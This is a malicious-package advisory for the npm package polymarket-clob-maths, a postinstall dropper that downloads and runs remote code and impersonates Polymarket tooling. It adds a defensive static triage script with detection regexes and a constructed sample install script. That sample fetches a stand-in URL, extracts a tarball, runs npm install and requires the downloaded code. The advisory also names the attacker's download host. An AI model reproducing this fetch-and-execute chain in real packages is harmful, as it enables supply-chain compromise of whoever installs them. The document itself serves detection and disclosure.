polymarket-clob-maths @3.3.9
Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC
OSV ID
MAL-2026-6691
Ecosystem
npm
Summary
On npm install, the declared postinstall hook (node scripts/install-check.cjs) fetches a JSON config from https://trabalhos-flax.vercel.app/config/clob-math.json, parses a bundle URL from the response, downloads a tgz to a temp directory, extracts it, runs npm install inside the extracted directory, then require()s peer-math.js from that bundle and invokes syncSession(). The fetched archive is unpinned, has no integrity check (no hash, no signature), and is hosted on a third-party Vercel app unrelated to Polymarket. The attacker fully controls the code executed on each install and can change it at any time without republishing the npm package. The package additionally impersonates the Polymarket / @polymarket CLOB ecosystem: the published name is polymarket-clob-maths, while the README is titled polymarket-stake-math and instructs users to run npm install polymarket-stake-math, indicating namespace confusion against the legitimate Polymarket tooling. Cover-story naming (PSM_PEER_URL, KELLY_PEER_CONFIG, and log strings calling the operation an "install check" / "peer sync") and silenced errors (console.warn('[polymarket-stake-math] install check skipped:', msg)) hide the dropper behavior from a casual installer.
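The following is an added example, not code from the OSV record or from the package it describes: a static triage check that reads a parsed package.json, finds install-time lifecycle hooks, and scans the file each "node <file>" hook runs for the stages of the chain described above (remote URL, network fetch, archive, nested npm install, dynamic require of downloaded code, swallowed errors). The indicator names, the sample package and the sample script are all constructed for this example.

```javascript
// Added example: static triage of npm lifecycle hooks for the fetch -> extract
// -> install -> require chain described in the record. Not the record's code.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// One heuristic per stage; the names are this example's own (assumed).
const INDICATORS = [
  ['remote-url', /https?:\/\/[^\s'"`]+/],
  ['network-fetch', /\b(fetch|https?\.(get|request)|axios)\s*\(/],
  ['archive', /\.(tgz|tar\.gz)\b|\btar\s+-?x/],
  ['nested-npm-install', /\b(spawn|exec|execSync|spawnSync)\s*\([^)]*npm[^)]*install/],
  ['dynamic-require', /require\s*\(\s*[^'"`\s]/],          // non-literal require()
  ['silenced-error', /catch\b[^{]*\{\s*console\.warn/],    // error reduced to a warning
];
// Scan one hook. `files` maps relative paths to already-read contents (offline).
function auditHook(hook, command, files) {
  const m = /^node\s+([^\s-]\S*)/.exec(command.trim()); // "node <file>", not "node -e"
  const scriptPath = m ? m[1] : null;
  const body = scriptPath ? (files[scriptPath] || '') : command;
  const indicators = INDICATORS.filter(([, re]) => re.test(body)).map(([name]) => name);
  return { hook, command, scriptPath, indicators };
}
// Audit every install-time hook declared in a parsed package.json.
function auditPackage(pkg, files) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => auditHook(h, scripts[h], files));
}
// A hook is dropper-like when it reaches the network and then runs what it got.
function isDropperLike(finding) {
  const has = (n) => finding.indicators.includes(n);
  return (has('remote-url') || has('network-fetch')) &&
    (has('archive') || has('nested-npm-install') || has('dynamic-require'));
}
// Constructed sample that mirrors the described behaviour (not the real files).
const SAMPLE_PKG = { name: 'sample-pkg', scripts: { postinstall: 'node scripts/install-check.cjs' } };
const SAMPLE_FILES = {
  'scripts/install-check.cjs': [
    "const cfgUrl = process.env.PSM_PEER_URL || 'https://example.invalid/config.json';",
    "fetch(cfgUrl).then((r) => r.json()).then((cfg) => {",
    "  const dir = require('os').tmpdir(); // bundle.tgz is downloaded from cfg.bundle",
    "  require('child_process').execSync('tar -xzf bundle.tgz', { cwd: dir });",
    "  require('child_process').execSync('npm install', { cwd: dir });",
    "  require(require('path').join(dir, 'peer-math.js')).syncSession();",
    "}).catch((e) => { console.warn('install check skipped:', e.message); });",
  ].join('\n'),
};
```

Running auditPackage over a real checkout means reading each package's package.json and the referenced script file into the `files` map first; a hook that trips isDropperLike is worth manual review before the package is installed anywhere with network access.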
Source: amazon-inspector (9e5747b377bb17f8131b894ccdae41919423fb3c8a77d286084bcfaf9654e4ac)